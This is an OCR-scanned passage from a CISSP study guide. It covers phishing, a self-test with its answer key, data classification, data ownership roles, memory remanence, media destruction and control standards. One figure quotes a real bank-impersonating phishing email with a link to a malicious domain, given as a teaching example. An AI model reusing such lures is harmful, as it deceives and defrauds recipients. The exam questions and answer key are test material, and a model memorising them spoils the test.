FIGURE 2.13 “PNC” Bank Phishing Attempt 


♦»<= notify you that the sign on process to PINACLE Express is changing . <br> 

The updates will be applied at the begining of April. <br> 

<$► We recommend you to look through the <A HREF="http: //ityf ifuz • com/ywenage . html" 

problems in future. <br> 

^ This is an automated message. Please, don't reply . <br XbrXbr> 


FIGURE 2.14 Phishing Email “DEMO” URL 


PHISHERS AND SPEAR PHISHERS 

A phisher (“fisher” spelled with the hacker spelling of “ph” instead of “f ’) is mali- 
cious attacker who attempts to trick users into divulging account credentials or PII. 
Many phishers attempt to steal online banking information, as the phishing attack in 
Figure 2.13 shows. 

This phishing attack triggered a warning from the email system, correctly warn- 
ing, “This message may not be from whom it claims to be.” The attack is attempting 
to trick the user into clicking on the “demo” link, which is a malicious link pointing 
to a domain in Costa Rica (with no connection to PNC Bank); the relevant email 
plain text is highlighted in Figure 2. 14. 

Phishing is a social engineering attack that sometimes includes other attacks, 
including client-side attacks. Users who click links in phishing emails may be sub- 
ject to client-side attacks and theft of credentials. Simply visiting a phishing site is 
dangerous: the client may be automatically compromised. 

Phishing attacks tend to be large scale: thousands or many more users may be 
targeted. The phishers are playing the odds: if they email 100,000 users and l/10th 
of 1% of them click, the phisher will have 100 new victims. Spear phishing targets 
far fewer users: as little as a handful of users per organization. These targets are 
high value (often executives), and spear phishing attacks are more targeted, typically 
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referring to the user by their full name, title, and other supporting information. Spear 
phishers target fewer users, but each potential victim is worth far more. Spear 
phishing is also called whaling or whale hunting (the executives are high-value 
“whales”). 

Finally, vishing is voice phishing: attacks launched using the phone system. 
Attackers use automated voice scripts on voice over IP (VoIP) systems to automate 
calls to thousands of targets. Typical vishing attacks include telling the user that their 
bank account is locked, and the automated voice system will unlock it after verifying 
key information, such as account number and PIN. 


SUMMARY OF EXAM OBJECTIVES 

Information security governance assures that an organization has the correct 
information structure, leadership, and guidance. Governance helps assure that 
a company has the proper administrative controls to mitigate risk. Risk Analysis 
(RA) helps ensure that an organization properly identifies, analyzes, and mitigates 
risk. Accurately assessing risk, and understanding terms such as Annualized Loss 
Expectancy, Total Cost of Ownership, and Return on Investment will not only help 
you in the exam, but also help advance your information security career. 

An understanding and appreciation of legal systems, concepts, and terms are 
required of an information security pra ctitioner working in the information-centric 
world today. The impact of the ubiquity of information systems on legal systems 
cannot be overstated. Whether the major legal system is Civil, Common, Religious, 
or a hybrid, information systems have made a lasting impact on legal systems 
throughout the world, causing the creation of new laws, reinterpretation of existing 
laws, and simply a new appreciation for the unique aspects that computers bring to 
the courts. 

Finally, the nature of information security and the inherent sensitivity therein, 
makes ethical frameworks an additional point requiring attention. This chapter pre- 
sented the lAB’s RFC on Ethics and the Internet, the Computer Ethics Institute’s 
Ten Commandments of Computer Ethics, and The (ISC) 2 ® Code of Ethics. The 
CISSP® exam will, no doubt, emphasize the Code of Ethics proffered by (ISC) 2 ®, 
which presents an ordered set of four canons that attend to matters of the public, 
the individual’s behavior, providing competent service, and the profession as a 
whole. 


SELF TEST 


NOTE 

Please see the Self Test Appendix for explanations of all correct and incorrect answers. 


Self Test 


1 . Which of the following would be an example of a policy statement? 

A. Protect PII by hardening servers 

B. Harden Windows 7 by first installing the pre-hardened OS image 

C. You may create a strong password by choosing the first letter of each word 
in a sentence and mixing in numbers and symbols 

D. Download the CISecurity Windows benchmark and apply it 

2 . Which of the following describes the money saved by implementing a security 
control? 

A. Total Cost of Ownership 

B. Asset Value 

C. Return on Investment 

D. Control Savings 

3 . Which of the following is an example of program policy? 

A. Establish the information security program 

B. Email Policy 

C. Application development policy 

D. Server policy 

4 . Which of the following proves an identity claim? 

A. Authentication 

B. Authorization 

C. Accountability 

D. Auditing 

5 . Which of the following protects against unauthorized changes to data? 

A. Confidentiality 

B. Integrity 

C. Availability 

D. Alteration 

Use the following scenario to answer questions 6 through 8: 

Your company sells Apple iPods online and has suffered many denial-of- 
service (DoS) attacks. Your company makes an average $20,000 profit per 
week, and a typical DoS attack lowers sales by 40%. You suffer seven DoS 
attacks on average per year. A DoS-mitigation service is available for a 
subscription fee of $ 10,000/month. You have tested this service, and believe it 
will mitigate the attacks. 

6 . What is the Annual Rate of Occurrence in the above scenario? 

A. $20,000 

B. 40% 

C. 7 

D. $10,000 

7 . What is the annualized loss expectancy (ALE) of lost iPod sales due to the 
DoS attacks? 

A. $20,000 

B. $8000 

C. $84,000 

D. $56,000 
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8 . Is the DoS mitigation service a good investment? 

A. Yes, it will pay for itself 

B. Yes, $10,000 is less than the $56,000 Annualized Loss Expectancy 

C. No, the annual Total Cost of Ownership is higher than the Annualized 
Loss Expectancy 

D. No, the annual Total Cost of Ownership is lower than the Annualized Loss 
Expectancy 

9. Which of the following steps would be taken while conducting a Qualitative 
Risk Analysis? 

A. Calculate the Asset Value 

B. Calculate the Return on Investment 

C. Complete the Risk Analysis Matrix 

D. Complete the Annualized Loss Expectancy 

10. What is the difference between a standard and a guideline? 

A. Standards are compulsory and guidelines are mandatory 

B. Standards are recommendations and guidelines are requirements 

C. Standards are requirements and guidelines are recommendations 

D. Standards are recommendations and guidelines are optional 

1 1 . An attacker sees a building is protected by security guards, and attacks a 
building next door with no guards. What control combination are the security 
guards? 

A. Physical/Compensating 

B. Physical/Detective 

C. Physical/Deterrent 

D. Physical/Preventive 

1 2. Which canon of The (ISC)2® Code of Ethics should be considered the most 
important? 

A. Protect society, the commonwealth, and the infrastructure 

B. Advance and protect the profession 

C. Act honorably, honestly, justly, responsibly, and legally 

D. Provide diligent and competent service to principals 

1 3. Which doctrine would likely allow for duplication of copyrighted material for 
research purposes without the consent of the copyright holder? 

A. First sale 

B. Fair use 

C. First privilege 

D. Free dilution 

1 4. Which type of intellectual property is focused on maintaining brand 
recognition? 

A. Patent 

B. Trade Secrets 

C. Copyright 

D. Trademark 


Self Test Quick Answer Key 77 


1 5. Drag and drop: Identify all objects listed below. Drag and drop all objects 
from left to right. 

Possible Answers Correct Answers 


Readme.txt file 


Database Table 


Running login 
process 


Authenticated 

user 


1099 Tax Form 


FIGURE 2.15 Drag and Drop 


SELF TEST QUICK ANSWER KEY 

1. A 

2. C 

3. A 

4. A 

5. B 

6. C 

7. D 

8. C 

9. C 

10. C 

11. C 

12. A 

13. B 

14. D 
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Possible Answers Correct Answers 


Readme.txt file 


Database Table 


1099 Tax Form 


Running login 
process 




Authenticated 

user 


FIGURE 2.16 Drag and Drop Answer 
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EXAM OBJECTIVES IN THIS CHAPTER 

• Classifying Data 

• Ownership 

• Memory and Remanence 

• Data Destruction 

• Determining Data Security Controls 


UNIQUE TERMS AND DEFINITIONS 


• RAM — Random Access Memory, volatile hardware memory that loses integrity 
after loss of power 

• Remanence: Data that persists beyond noninvasive means to delete it. 

• Reference Monitor — Mediates all access between subjects and objects 

• ROM — Read Only Memory, nonvolatile memory that maintains integrity after 
loss of power 

• Scoping — The process of determining which portions of a standard will be 
employed by an organization 

• SSD — Solid State Drive, a combination of flash memory (EEPROM) and 
DRAM 

• Tailoring — The process of customizing a standard for an organization 


INTRODUCTION 


The Asset Security (Protecting Security of Assets) domain focuses on controls such 
as data classification clearances, labels, retention and ownership of data. We will 
discuss data remanence, including newly testable material such as the remanence 
properties of Solid State Drives (SSDs), which are a combination of EEPROM 
and RAM, and have quite different remanence properties compared to magnetic 
drives. The domain wraps up with a discussion of controls determination, including 
standards, scoping and tailoring. 


81 
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CLASSIFYING DATA 

Data classification has existed for millennia. In 678 AD the defenders of Constan- 
tinople first used Greek fire to defend the city vs. invading ships. The liquid was 
launched from the city walls, and could burn on water. “The composition and use of 
Greek fire was a state secret that died with the Byzantium empire, in fact disappeared 
long before Byzantium had run its course. To this day historians have been unable 
to agree on the composition and use of Greek fire, in spite of repeated attempts by 
chemists and historians to discern its nature from a fragmented historical record.” [1] 
Note that data classification is testable, but this historical example is not testable. 

The day-to-day management of access control requires management of labels, 
clearances, formal access approval, and need to know. These formal mechanisms are 
typically used to protect highly sensitive data, such as government or military data. 


LABELS 

Objects have labels, and as we will see in the next section, subjects have clearances. 
A critical security step is the process of locating sensitive information, and labeling 
or marking it as sensitive. How the data is labeled should correspond to the organi- 
zational data classification scheme. 

The object labels used by many world governments are confidential, secret and 
top secret. According to Executive Order 12356 — National Security Information: 

• “Top Secret” shall be applied to information, the unauthorized disclosure of 
which reasonably could be expected to cause exceptionally grave damage to the 
national security. 

• “Secret” shall be applied to information, the unauthorized disclosure of which 
reasonably could be expected to cause serious damage to the national security. 

• “Confidential” shall be applied to information, the unauthorized disclosure of 
which reasonably could be expected to cause damage to the national security. [2] 

This describes the classification criteria. A security administrator who applies a 
label to an object must follow these criteria. Additional labels exist, such as unclas- 
sified (data that is not sensitive), SBU (Sensitive but Unclassified), and For Official 
Use Only (FOUO). SBU describes sensitive data that is not a matter of national secu- 
rity, such as the healthcare records of enlisted personnel. This data must be protected, 
even though its release would not normally cause national security issues. 

Private sector companies use labels such as “Internal Use Only” and “Company 
Proprietary.” 


SECURITY COMPARTMENTS 

Compartments allow additional control over highly sensitive information. This is 
called Sensitive Compartmented Information (SCI). Compartments used by the United 
States include HCS, COMINT (SI), GAMMA (G), TALENT KEYHOLE (TK), and 
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others (these are listed as examples to illustrate the concept of compartments; the 
specific names are not testable). These compartments require a documented and 
approved need to know in addition to a normal clearance such as top secret. 


CLEARANCE 

A clearance is a formal determination of whether or not a user can be trusted with 
a specific level of information. Clearances must determine the subject’s current and 
potential future trustworthiness; the latter is harder (and more expensive) to assess. For 
example: are there any issues, such as debt or drug or alcohol abuse, which could lead 
an otherwise ethical person to violate their ethics? Is there a personal secret that could 
be used to blackmail this person? A clearance attempts to make these determinations. 

In many world governments, these clearances mirror the respective object labels 
of confidential, secret, and top secret. Each clearance requires a myriad of investi- 
gations and collection of personal data. Once all data has been gathered (including 
a person’s credit score, arrest record, interviews with neighbors and friends, and 
more), an administrative judge makes a determination on whether this person can be 
trusted with U.S. national security information. 


NOTE 

A great resource to see what is required to obtain a U.S. government security clearance can be 
found at http://www.dod.mil/dodgc/doha/industrial/. This Web site, maintained by the United States 
Department of Defense Office of Hearings and Appeals (known as DOHA), posts U.S. government 
security clearance decisions for contractors who have appealed their initial decision (one does not 
appeal a favorable decision, so these have all been denied). It is fascinating to read the circumstances 
behind why people have either been granted or lost their U.S. government security clearance. The 
applicant’s name and any identifying information have been removed from the content but the 
circumstances of their case are left for all to read. Typically, drug use and foreign influence are the 
two most popular reasons why people are not granted a U.S. Government clearance. 


FORMAL ACCESS APPROVAL 

Formal access approval is documented approval from the data owner for a subject to 
access certain objects, requiring the subject to understand all of the rules and require- 
ments for accessing data, and consequences should the data become lost, destroyed, 
or compromised. 


NOTE 

When accessing North Atlantic Treaty Organization (NATO) information, the compartmented 
information is called, “NATO Cosmic.” Not only would a user be required to have the clearance 
to view NATO classified information, they would also require formal access approval from the 
NATO security official (data owner) to view the Cosmic compartmented information. Note that 
compartments are a testable concept, but the name of Cosmic compartment itself is not testable. 
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NEED TO KNOW 

Need to know refers to answering the question: does the user “need to know” the 
specific data they may attempt to access? It is a difficult question, especially when 
dealing with large populations across large IT infrastructures. Most systems rely on 
least privilege and require the users to police themselves by following policy and only 
attempt to obtain access to information that they have a need to know. Need to know 
is more granular than least privilege: unlike least privilege, which typically groups 
objects together, need to know access decisions are based on each individual object. 


SENSITIVE INFORMATION/MEDIA SECURITY 

Though security and controls related to the people within an enterprise are vitally 
important, so is having a regimented process for handling sensitive information, 
including media security. This section discusses concepts that are an important 
component of a strong overall information security posture. 

Sensitive Information 

All organizations have sensitive information that requires protection, and that sensi- 
tive information physically resides on some form of media. In addition to primary 
storage, backup storage must also be considered. It is also likely that sensitive in- 
formation is transferred, whether internally or externally, for use. Wherever the data 
exists, there must be processes that ensure the data is not destroyed or inaccessible 
(a breach of availability), disclosed (a breach of confidentiality), or altered (a breach 
of integrity). 

Handling 

People handling sensitive media should be trusted individuals who have been vetted 
by the organization. They must understand their role in the organization’s infor- 
mation security posture. Sensitive media should have strict policies regarding its 
handling. Policies should require the inclusion of written logs detailing the person 
responsible for the media. Historically, backup media has posed a significant prob- 
lem for organizations. 

Storage 

When storing sensitive information, it is preferable to encrypt the data. Encryption of 
data at rest greatly reduces the likelihood of the data being disclosed in an unauthor- 
ized fashion due to media security issues. Physical storage of the media containing 
sensitive information should not be performed in a haphazard fashion, whether the 
data is encrypted or not. Care should be taken to ensure that there are strong physi- 
cal security controls wherever media containing sensitive information is accessible. 

Retention 

Media and information have a limited useful life. Retention of sensitive information 
should not persist beyond the period of usefulness or legal requirement (whichever 
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is greater), as it needlessly exposes the data to threats of disclosure when the data is 
no longer needed by the organization. Keep in mind there may be regulatory or other 
legal reasons that may compel the organization to maintain such data beyond its time 
of utility. 


OWNERSHIP 

Primary information security roles include business or mission owners, data owners, 
system owners, custodians, and users. Each plays a different role in securing an 
organization’s assets. 


BUSINESS OR MISSION OWNERS 

Business Owners and Mission Owners (senior management) create the information 
security program and ensure that it is properly staffed, funded, and has organiza- 
tional priority. They are responsible for ensuring that all organizational assets are 
protected. 


DATA OWNERS 

The Data Owner (also called information owner) is a management employee 
responsible for ensuring that specific data is protected. Data owners determine data 
sensitivity labels and the frequency of data backup. They focus on the data itself, 
whether in electronic or paper form. A company with multiple lines of business may 
have multiple data owners. The data owner performs management duties; Custodians 
perform the hands-on protection of data. 


EXAM WARNING 


Do not confuse the Data Owner with a user who “owns” his/her data on a discretionary access 
control system (see Chapter 6, Domain 5: Identity and Access Management, for more information 
on DAC, or discretionary access control systems). 

The Data Owner (capital “O”) is responsible for ensuring that data is protected. A user who 
“owns” data (lower case “o”) has read/write access to objects. 


SYSTEM OWNER 

The System Owner is a manager responsible for the actual computers that house data. 
This includes the hardware and software configuration, including updates, patching, 
etc. They ensure the hardware is physically secure, operating systems are patched 
and up to date, the system is hardened, etc. Technical hands-on responsibilities are 
delegated to Custodians, discussed next. 




CHAPTER 3 Doma in 2: Asset Security (Protecting Security of Assets) 


NOTE 

The difference between a System Owner and a Data Owner is straightforward. The System Owner 
is responsible for securing the computer hardware and software. The Data Owner is responsible for 
protecting the data contained within the computer. 

For example: for a database server, the system owner would secure the hardware and software, 
including patching the Database Management System (such as MySQL or Oracle). The data owner 
would secure the data itself: sensitive data contained within database tables, such as Personally 
Identifiable Information (PII). 


CUSTODIAN 

A Custodian provides hands-on protection of assets such as data. They perform data 
backups and restoration, patch systems, configure antivirus software, etc. The Custo- 
dians follow detailed orders; they do not make critical decisions on how data is pro- 
tected. The Data Owner may dictate, “All data must be backed up every 24 hours.” 
The Custodians would then deploy and operate a backup solution that meets the Data 
Owner’s requirements. 


USERS 

Users must follow the rules: they must comply with mandatory policies, procedures, 
standards, etc. They must not write their passwords down or share accounts, for 
example. Users must be made aware of these risks and requirements. You cannot 
assume they will know what to do, nor assume they are already doing the right thing: 
they must be told, via information security awareness. They must also be made aware 
of the penalty for failing to comply with mandatory directives such as policies. 


DATA CONTROLLERS AND DATA PROCESSORS 

Data controllers create and manage sensitive data within an organization. Human 
resources employees are often data controllers: they create and manage sensitive 
data, such as salary and benefit data, reports from employee sanctions, etc. 

Data processors manage data on behalf of data controllers. An outsourced pay- 
roll company is an example of a data processor. They manage payroll data (used to 
determine the amount to pay individual employees) on behalf of a data controller, 
such as an HR department. 


DATA COLLECTION LIMITATION 

Organizations should collect the minimum amount of sensitive information that is 
required. 

The Organisation (sic) for Economic Co-operation and Development (OECD, 
discussed in Chapter 2, Domain 1: Security and Risk Management) Collection 
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Limitation Principle discusses data limitation: “There should be limits to the collec- 
tion of personal data and any such data should be obtained by lawful and fair means 
and, where appropriate, with the knowledge or consent of the data subject” [3] 


MEMORY AND REMANENCE 

The 2015 exam update added timely topics such as remanence properties of Solid 
State Drives (SSDs), discussed shortly. We will begin by discussing computer 
memory itself, followed by remanence properties of volatile and nonvolatile memory. 
Note that related concepts such as memory protection and CPU design are described 
in Chapter 4, Domain 3: Security Engineering. 

DATA REMANENCE 

The term data remanence is important to understand when discussing media sanitiza- 
tion and data destruction. Data remanence is data that persists beyond noninvasive 
means to delete it. Though data remanence is sometimes used specifically to refer to 
residual data that persists on magnetic storage, remanence concerns go beyond just 
that of magnetic storage media. Security professionals must understand the rema- 
nence properties of various types of memory and storage, and appreciate the steps to 
make data unrecoverable. 

MEMORY 

Memory is a series of on-off switches representing bits: Os (off) and Is (on). Memory 
may be chip-based, disk-based, or use other media such as tape. RAM is Random 
Access Memory: “random” means the CPU may randomly access (jump to) any 
location in memory. Sequential memory (such as tape) must sequentially read 
memory, beginning at offset zero, to the desired portion of memory. Volatile memory 
(such as RAM) loses integrity after a power loss; nonvolatile memory (such as ROM, 
disk, or tape) maintains integrity without power. 

Real (or primary) memory, such as RAM, is directly accessible by the CPU and 
is used to hold instructions and data for currently executing processes. Secondary 
memory, such as disk-based memory, is not directly accessible. 

Cache Memory 

Cache memory is the fastest memory on the system, required to keep up with the 
CPU as it fetches and executes instructions. The data most frequently used by the 
CPU is stored in cache memory. The fastest portion of the CPU cache is the register 
file, which contains multiple registers. Registers are small storage locations used by 
the CPU to store instructions and data. 

The next fastest form of cache memory is Level 1 cache, located on the CPU 
itself. Finally, Level 2 cache is connected to (but outside) the CPU. SRAM (Static 
Random Access Memory) is used for cache memory. 
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NOTE 

As a general rule, the memory closest to the CPU (cache memory) is the fastest and most expensive 
memory in a computer. As you move away from the CPU, from SRAM, to DRAM to disk, to tape, 
etc., the memory becomes slower and less expensive. 


RAM and ROM 

RAM is volatile memory used to hold instructions and data of currently running pro- 
grams. It loses integrity after loss of power. RAM memory modules are installed into 
slots on the computer motherboard. RAM is also becoming increasingly embedded 
in computer motherboards, making upgrading difficult, if not impossible. 

ROM (Read Only Memory) is nonvolatile: data stored in ROM maintains integ- 
rity after loss of power. A computer Basic Input Output System (BIOS) Firmware is 
stored in ROM. While ROM is “read only,” some types of ROM may be written to 
via flashing, as we will see shortly in the “Flash Memory” section. 


NOTE 

The volatility of RAM is a subject of ongoing research. Historically, it was believed that DRAM 
lost integrity after loss of power. The “cold boot” attack has shown that RAM has remanence: it 
may maintain integrity seconds or even minutes after power loss. This has security ramifications: 
encryption keys usually exist in plaintext in RAM, and may be recovered by “cold booting” a 
computer off a small OS installed on DVD or USB key, and then quickly dumping the contents of 
memory. A video on the implications of cold boot called “Lest We Remember: Cold Boot Attacks 
on Encryption Keys” is available at http://citp.princeton.edu/memory/ 

Remember that the exam sometimes simplifies complex matters. For the exam, simply 
remember that RAM is volatile (though not as volatile as we once believed). 


DRAM and SRAM 

Static Random Access Memory (SRAM) is fast, expensive memory that uses small 
latches called “flip-flops” to store bits. Dynamic Random Access Memory (DRAM) 
stores bits in small capacitors (like small batteries), and is slower and cheaper 
than SRAM. The capacitors used by DRAM leak charge, and must be continu- 
ally refreshed to maintain integrity, typically every few to a few hundred millisec- 
onds, depending on the type of DRAM. Refreshing reads and writes the bits back 
to memory. SRAM does not require refreshing, and maintains integrity as long as 
power is supplied. 

Firmware 

Firmware stores small programs that do not change frequently, such as a computer’s 
BIOS (discussed below), or a router’s operating system and saved configuration. 
Various types of ROM chips may store firmware, including PROM, EPROM, and 
EEPROM. 
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PROM (Programmable Read Only Memory) can be written to once, typically at 
the factory. EPROMs (Erasable Programmable Read Only Memory) and EEPROMs 
(Electrically Erasable Programmable Read Only Memory) may be “flashed,” or 
erased and written to multiple times. The term “flashing” derives from the use 
of EPROMs: flashing ultraviolet light on a small window on the chip erased 
the EPROM. The window was usually covered with foil to avoid accidental erasure 
due to exposure to light. EEPROMs are the modern type of ROM, electrically eras- 
able via the use of flashing programs. 

A Programmable Logic Device (PLD) is a field-programmable device, which 
means it is programmed after it leaves the factory. EPROMs, EEPROMS, and Flash 
Memory are examples of PLDs. 

Flash Memory 

Flash memory (such as USB thumb drives) is a specific type of EEPROM, used for 
small portable disk drives. The difference is any byte of an EEPROM may be writ- 
ten, while flash drives are written by (larger) sectors. This makes flash memory faster 
than EEPROMs, but still slower than magnetic disks. 


NOTE 

Firmware is chip-based, unlike magnetic disks. The term “flash drive” may lead some to think 
that flash memory drives are “disk drives.” They are physically quite different, and have different 
remanence properties. 

A simple magnetic field will not erase flash memory. Secure destruction methods used for 
magnetic drives, such as degaussing (which we will discuss shortly) will not work with flash drives. 


Solid State Drives (SSDs) 

A Solid State Drive (SSD) is a combination of flash memory (EEPROM) and DRAM. 
Degaussing has no effect on SSDs. Also: while physical disks have physical blocks 
(“block 1” is on a specific physical location on a magnetic disk), blocks on SSDs 
are logical, and are mapped to physical blocks. Also: SSDs do not overwrite 
blocks that contain data: the device will instead write data to an unused block, and 
mark the previous block unallocated. 

A process called garbage collection later takes care of these old blocks: “Unused 
and unerased blocks are moved out of the way and erased in the background. This is 
called the ‘garbage collection’ process. Working in the background, garbage collec- 
tion systematically identifies which memory cells contain unneeded data and clears 
the blocks of unneeded data during off-peak times to maintain optimal write speeds 
during normal operations.” [4] 

The TRIM command improves garbage collection. “TRIM is an attribute of the 
ATA Data Set Management Command. The TRIM function improves compatibility, 
endurance, and performance by allowing the drive to do garbage collection in the 
background. This collection eliminates blocks of data, such as deleted files.” [5] 
While the TRIM command improves performance: it does not reliably destroy data. 


CHAPTER 3 Doma in 2: Asset Security (Protecting Security of Assets) 


A ‘sector by sector overwrite’ behaves very differently on an SSD vs. a magnetic 
drive, and does not reliably destroy all data. Also, electronically shredding a file 
(overwriting the file’s data before deleting it, which we will discuss shortly) is not 
effective. 

Tests performed by the Department of Computer Science and Engineering, Uni- 
versity of California, San Diego found: “Overall, the results for overwriting are poor: 
while overwriting appears to be effective in some cases across a wide range of drives, 
it is clearly not universally reliable. It seems unlikely that an individual or organiza- 
tion expending the effort to sanitize a device would be satisfied with this level of 
performance.” [6] 

Data on SSD drives that are not physically damaged may be securely removed via 
ATA Secure Erase. SanDisk provides the following details: “When the relevant secure 
erase command is executed on the SanDisk SSD, all blocks in the physical address 
space, regardless of whether they are currently or were previously allocated to the 
logical space, are completely erased (the “logical to physical mapping table” is also 
erased). Additionally, a new encryption key is generated and the old key is discarded. 

This erase operation does not overwrite the blocks like an HDD write or format 
command would. Data is written to flash on a page-level and a page must be com- 
pletely erased before it can be written to again. Unlike HDDs, which may leave rem- 
nants of data in regions between tracks, an erased flash cell is restored to the same 
content it contained at the time it was manufactured. As in the case with an HDD, 
physical blocks that have been marked “bad” may still contain remnant user data. 
There is no way to access these blocks to overwrite them, and secure erase makes 
no attempt to do so. Because the secure erase operation also regenerates the internal 
encryption key, it is not possible to decrypt the data, even if it were accessible.” [7] 

The two valid options for destroying data on SSD drives are ATA secure erase 
and destruction. Destruction is the best method for SSD drives that are physically 
damaged. 


DATA DESTRUCTION 

All forms of media should be securely cleaned or destroyed before disposal to 
prevent object reuse, which is the act of recovering information from previously- 
used objects, such as computer files. Objects may be physical (such as paper files in 
manila folders) or electronic (data on a hard drive). 

Object reuse attacks range from nontechnical attacks such as dumpster diving 
(searching for information by rummaging through unsecured trash) to technical at- 
tacks such as recovering information from unallocated blocks on a disk drive. Dump- 
ster diving was first popularized in the 1960s by “phone phreaks” (in “hacker speak” 
a phreak is a hacker who hacks the phone system). An early famous dumpster diver 
was Jerry Schneider, who scavenged parts and documents from Pacific Telephone 
and Telegraph’s dumpsters. Schneider was so familiar with the phone company’s 
practices that he was able to leverage dumpster diving and social engineering attacks 
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to order and receive telephone equipment without paying. He was later arrested for 
this crime in 1972. Read more about Jerry’s attacks at http://www.bookrags.com/ 
research/jerry-schneider-omc/. 

All cleaning and destruction actions should follow a formal policy, and all such 
activity should be documented, including the serial numbers of any hard disks, type 
of data they contained, date of cleaning or destruction, and personnel performing 
these actions. 

OVERWRITING 

Simply “deleting” a file removes the entry from the File Allocation Table (FAT) and 
marks the data blocks as “unallocated.” Reformatting a disk destroys the old FAT 
and replaces it with a new one. In both cases, data itself usually remains and can 
be recovered through the use of forensic tools. This issue is called data remanence 
(there are “remnants” of data left behind). 

Overwriting writes over every character of a file or entire disk drive and is far 
more secure than deleting or formatting a disk drive. Common methods include 
writing all zeroes or writing random characters. Electronic “ shredding ” or “ wiping ” 
overwrites the file’s data before removing the FAT entry. 

Many tools perform multiple rounds of overwrites to the same data, though the 
usefulness of the additional passes is questionable. There are no known commercial 
tools (today) that can recover data overwritten with a single pass. 

One limitation of overwriting is you cannot tell if a drive has been securely over- 
written by simply looking at it, so errors made during overwriting can lead to data 
exposure. It may also be impossible to overwrite damaged media. 


NOTE 

For many years security professionals and other technologists accepted that data could theoretically 
be recovered even after having been overwritten. Though the suggested means of recovery 
involved both a clean room and an electron microscope, which is likely beyond the means of most 
would be attackers, organizations typically employed either what has been referred to as the DoD 
(Department of Defense) short method, DoD standard method or Gutmann approach [8] to wiping, 
which involved either 3, 7, or 35 successive passes, respectively. For (undamaged) magnetic 
media: now it is commonly considered acceptable in industry to have simply a single successful 
pass to render data unrecoverable. This has saved organizations many hours that were wasted on 
unnecessary repeat wipes. 


DEGAUSSING 

Degaussing destroys the integrity of magnetic media such as tapes or disk drives by 
exposing them to a strong magnetic field, destroying the integrity of the media and 
the data it contains. The drive integrity is typically so damaged that a degaussed disk 
drive usually can no longer be formatted. 
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DESTRUCTION 

Destruction physically destroys the integrity of media by damaging or destroying the 
media itself, such as the platters of a disk drive. Destructive measures include incin- 
eration, pulverizing, shredding, and bathing metal components in acid. 

Destruction of objects is more secure than overwriting. It may not be possible 
to overwrite damaged media (though data may still be recoverable). As previously 
discussed: data on media such as Solid State Drives cannot be reliably removed via 
overwriting. Also, some magnetic media such as WORM (Write Once Read Many) 
drives and CD-Rs (Compact Disc-Recordable) can only be written once, and cannot 
be subsequently overwritten. Highly sensitive data should be degaussed or destroyed 
(perhaps in addition to overwriting). Destruction enhances defense-in-depth, allow- 
ing confirmation of data destruction via physical inspection. 

SHREDDING 

A simple form of media sanitization is shredding, a type of physical destruction. 
Though this term is sometimes used in relation to overwriting of data, here shredding 
refers to the process of making data printed on hard copy, or on smaller objects such as 
floppy or optical disks, unrecoverable. Sensitive information such as printed informa- 
tion needs to be shredded prior to disposal in order to thwart a dumpster diving attack. 

Paper shredders cut paper to prevent object reuse. Strip-cut shredders cut the 
paper into vertical strips. Cross-cut shredders are more secure than strip-cut, and cut 
both vertically and horizontally, creating small paper “confetti”. Given enough time 
and access to all of the shredded materials, attackers can recover shredded docu- 
ments, though it is more difficult with cross-cut shredders. 

Dumpster diving is a physical attack in which a person recovers trash in hopes of 
finding sensitive information that has been merely discarded in whole rather than being 
run through a shredder, incinerated, or otherwise destroyed. Figure 3.1 shows locked 
shred bins that contain material that is intended for shredding. The locks are intended to 
ensure that dumpster diving is not possible during the period prior to shredding. 


DETERMINING DATA SECURITY CONTROLS 

Determining which data security controls to employ is a critical skill. Baselines, 
standards, scoping and tailoring are used to choose and customize which controls 
are employed. Also: controls determination will be dictated by whether the data is at 
rest or in motion. 

CERTIFICATION AND ACCREDITATION 

Let’s begin the discussion of standards by describing certification and accreditation. 
Certification means a system has been certified to meet the security requirements 
of the data owner. Certification considers the system, the security measures taken 
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FIGURE 3.1 Locked Shred Bins 

Source: http://commons. wikimedia. org/wiki/Fiie-.Conf identiai_shred_bins.JPG 

Photograph by: © BrokenSphere / Wikimedia Commons. Image under permission of Creative Commons 

Attribution ShareAlike 3.0 


to protect the system, and the residual risk represented by the system. Accreditation 
is the data owner’s acceptance of the certification, and of the residual risk, which is 
required before the system is put into production. 


STANDARDS AND CONTROL FRAMEWORKS 

A number of standards are available to determine security controls. Some, such as 
PCI-DSS (Payment Card Industry Data Security Standard,), are industry-specific 
(vendors who use credit cards as an example). Others, such as OCTAVE®, ISO 
17799/27002, and COBIT, are more general. 
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PCI-DSS 

The Payment Card Industry Data Security Standard (PCI-DSS) is a security standard 
created by the Payment Card Industry Security Standards Council (PCI-SSC). The 
council is comprised of American Express, Discover, Master Card, Visa, and others. 
PCI-DSS seeks to protect credit cards by requiring vendors using them to take spe- 
cific security precautions: “PCI-DSS is a multifaceted security standard that includes 
requirements for security management, policies, procedures, network architecture, 
software design, and other critical protective measures. This comprehensive standard 
is intended to help organizations proactively protect customer account data.” [9] 

The core principles of PCI-DSS (available at https://www.pcisecuritystandards. 
org/ security _standards/index.php) are : 

• Build and Maintain a Secure Network and Systems 

• Protect Cardholder Data 

• Maintain a Vulnerability Management Program 

• Implement Strong Access Control Measures 

• Regularly Monitor and Test Networks 

• Maintain an Information Security Policy [10] 

OCTAVE 0 

OCTAVE® stands for Operationally Critical Threat, Asset, and Vulnerability Evalu- 
ation sm , a risk management framework from Carnegie Mellon University. OCTAVE® 
describes a three-phase process for managing risk. Phase 1 identifies staff knowl- 
edge, assets, and threats. Phase 2 identifies vulnerabilities and evaluates safeguards. 
Phase 3 conducts the Risk Analysis and develops the risk mitigation strategy. 

OCTAVE® is a high-quality free resource that may be downloaded from: http:// 
www.cert.org/octave/ 

ISO 17799 and the ISO 27000 Series 

ISO 17799 was a broad-based approach for information security code of practice 
by the International Organization for Standardization (based in Geneva, Switzer- 
land). The full title is “ISO/IEC 17799:2005 Information technology — Security 
Techniques — Code of Practice for Information Security Management.” ISO 
17799:2005 signifies the 2005 version of the standard. It was based on BS (British 
Standard) 7799 Part 1. 

ISO 17799 had 11 areas, focusing on specific information security controls: 

1 . Policy 

2. Organization of information security 

3. Asset management 

4. Human resources security 

5. Physical and environmental security 

6 . Communications and operations management 

7. Access control 

8 . Information systems acquisition, development, and maintenance 
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9 . Information security incident management 

10 . Business continuity management 

11. Compliance [1 1] 

ISO 17799 was renumbered to ISO 27002 in 2005, to make it consistent with the 
27000 series of ISO security standards. ISO 27001 is a related standard, formally 
called “ISO/IEC 27001:2005 Information technology — Security techniques — Infor- 
mation Security Management Systems — Requirements.” ISO 27001 was based on 
BS 7799 Part 2. 

